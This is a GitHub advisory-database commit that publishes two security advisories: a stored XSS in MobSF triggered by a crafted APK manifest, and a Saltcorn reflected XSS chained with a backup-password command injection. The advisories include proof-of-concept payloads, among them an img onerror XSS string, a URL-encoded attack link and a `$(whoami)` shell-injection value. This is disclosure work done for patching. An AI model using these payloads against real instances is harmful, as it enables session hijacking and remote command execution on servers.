Skip to content

Commit 112c734

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-8hf7-h89p-3pqj GHSA-cr3w-cw5w-h3fj
1 parent 46f18f7 commit 112c734

2 files changed

Lines changed: 133 additions & 0 deletions

File tree

advisories/github-reviewed/2026/01/GHSA-8hf7-h89p-3pqj/GHSA-8hf7-h89p-3pqj.json

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8hf7-h89p-3pqj",
4+
"modified": "2026-01-26T23:36:19Z",
5+
"published": "2026-01-26T23:36:19Z",
6+
"aliases": [
7+
"CVE-2026-24490"
8+
],
9+
"summary": "MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field",
10+
"details": "### Summary\nA Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session by uploading a malicious APK. The `android:host` attribute from `<data android:scheme=\"android_secret_code\">` elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.\n\n### Details\nWhen MobSF analyzes an Android APK containing a `<data>` element with `android:scheme=\"android_secret_code\"`, it extracts the `android:host` attribute and inserts it directly into the analysis report without HTML escaping.\n\n### Vulnerable Code Path\n\n**1. Data Extraction** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 776):\n```python\nxmlhost = data.getAttribute(f'{ns}:host')\nret_list.append(('dialer_code_found', (xmlhost,), ()))\n```\n\n**2. Template String Formatting** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 806):\n```python\n'title': a_template['title'] % t_name, # XSS payload inserted here unescaped\n```\n\n**3. Template Definition** - `mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py` (line 200):\n```python\n'dialer_code_found': {\n 'title': 'Dailer Code: %s Found <br>[android:scheme=\\\"android_secret_code\\\"]',\n ...\n}\n```\n\n**4. Unsafe Rendering** - `mobsf/templates/static_analysis/android_binary_analysis.html` (line 1143):\n```html\n{{item|key:\"title\" | safe}}\n```\n\nThe `|safe` Django template filter bypasses auto-escaping, allowing the unescaped `android:host` value to be rendered as raw HTML.\n\n### PoC\n\n### Step 1: Create Malicious APK\n\nCreate an APK with the following `AndroidManifest.xml`:\n\n```xml\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.poc.xsstest\"\n android:versionCode=\"1\"\n android:versionName=\"1.0\">\n\n <application android:label=\"XSS PoC Test\">\n <receiver android:name=\".SecretCodeReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"android.provider.Telephony.SECRET_CODE\"/>\n <data android:scheme=\"android_secret_code\"\n android:host=\"&lt;img src=x onerror=alert(document.domain)&gt;\"/>\n </intent-filter>\n </receiver>\n </application>\n</manifest>\n```\n\n### Step 2: Build the APK\n\nUse apktool or Android build tools to create a valid APK with this manifest.\n\n### Step 3: Upload to MobSF\n\nUpload the malicious APK to MobSF for static analysis.\n\n### Step 4: Trigger XSS\n\nView the static analysis report in a browser. The JavaScript payload executes automatically.\n\n### Confirmed HTML Output\n\n```html\n<td>\nDailer Code: <img src=x onerror=alert(document.domain)> Found <br>[android:scheme=\"android_secret_code\"]\n</td>\n```\n\n### PoC APK Details\n\n| Field | Value |\n|-------|-------|\n| **Filename** | `POC_XSS_APK.apk ` |\n| **MD5 Hash** | `647258656ed03a7e6a0f2acce4ec6a5b` |\n| **Location** | https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk |\n\n### Impact\n\nThis is a **Stored Cross-site Scripting (XSS)** vulnerability affecting all MobSF users who analyze the results of the malicious APK file.\n\n### Attack Scenario\n\n1. Attacker crafts a malicious APK with XSS payload in the manifest\n2. Attacker submits APK to a shared MobSF instance or private mobsf instance. \n3. When any user views the analysis report, the XSS payload executes in their browser\n\n<img width=\"1435\" height=\"675\" alt=\"Screenshot 2026-01-15 at 12 24 29 AM\" src=\"https://github.com/user-attachments/assets/e282a0b2-236e-4199-a7ce-b96017cc7052\" />\n\n\nTested in MobSF Public Instance as well.\nhttps://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/ \n\n\n<img width=\"1440\" height=\"780\" alt=\"Screenshot 2026-01-15 at 12 24 57 AM\" src=\"https://github.com/user-attachments/assets/8673b76a-954a-45e7-833a-a64e0a972f2e\" />",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mobsf"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.4.5"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8hf7-h89p-3pqj"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/2b08dd050e7685ee2a14fdbb454affab94129eae"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.5"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-79"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-01-26T23:36:19Z",
63+
"nvd_published_at": null
64+
}
65+
}

advisories/github-reviewed/2026/01/GHSA-cr3w-cw5w-h3fj/GHSA-cr3w-cw5w-h3fj.json

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cr3w-cw5w-h3fj",
4+
"modified": "2026-01-26T23:34:49Z",
5+
"published": "2026-01-26T23:34:49Z",
6+
"aliases": [],
7+
"summary": "Saltcorn's Reflected XSS and Command Injection vulnerabilities can be chained for 1-click-RCE",
8+
"details": "### Summary\n1. There is a reflected XSS vulnerability in the GET /admin/edit-codepage/:name route through the name parameter. This can be used to hijack the session of an admin if they click a specially crafted link.\n2. Additionally, there is a Command Injection vulnerability in GET /admin/backup. The admin can inject a shell command in the backup password which is inserted in the command used to create the backup zip.\n\n\nBoth vulnerabilities can be chained to craft a malicious link which will execute an arbitrary shell command on the server if it is clicked by a saltcorn admin with an active session. I believe iframes could also be used to exploit this silently when the admin visits an attacker-controlled web page (though I have not tested that).\n\n### Details\n1. The XSS vulnerability is here: https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/server/routes/admin.js#L4886-L4887 Specifically, the name parameter is inserted into the pages breadcrumbs without sanitization.\n2. The Command Injection happens here: https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/saltcorn-admin-models/models/backup.ts#L381-L382\n\n### PoC\n1. A minimal PoC for the XSS can be as simple as: http://localhost:3000/admin/edit-codepage/%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E%0A (assuming saltcorn running at localhost:3000 and the user having an active admin session)\n2. For the Command Injection, visit the backup section of saltcorn, set an admin password like `\";$(whoami);\"` (including the quotation marks) and then click \"Download a backup\" in the \"Manual backup\" section. This should display an error page saying that /bin/sh could not find the binary named \"root\" or \"saltcorn\", depending on the user.\n\nAn example of an exploit that chains both vulnerabilities and generates the aforementioned malicious link:\n[exploit.zip](https://github.com/user-attachments/files/24356819/exploit.zip)\n\n### Affected Versions\nEdit: The following Docker containers from docker hub were tested: 1.4.1, 1.4.0, 1.3.1, 1.3.0, 1.2.0, 1.1.2, 1.1.1, 1.0.0\nThe Command Injection is applicable to versions >= 1.3.0.\nThe XSS is applicable to versions >= 1.1.1",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "@saltcorn/server"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "1.1.1"
27+
},
28+
{
29+
"fixed": "1.5.0-beta.19"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-cr3w-cw5w-h3fj"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/saltcorn/saltcorn/commit/1bf681e08c45719a52afcf3506fb5ec59f4974d5"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/saltcorn/saltcorn"
48+
},
49+
{
50+
"type": "WEB",
51+
"url": "https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/saltcorn-admin-models/models/backup.ts#L381-L382"
52+
},
53+
{
54+
"type": "WEB",
55+
"url": "https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/server/routes/admin.js#L4886-L4887"
56+
}
57+
],
58+
"database_specific": {
59+
"cwe_ids": [
60+
"CWE-77",
61+
"CWE-79"
62+
],
63+
"severity": "CRITICAL",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-01-26T23:34:49Z",
66+
"nvd_published_at": null
67+
}
68+
}

0 commit comments

Comments
 (0)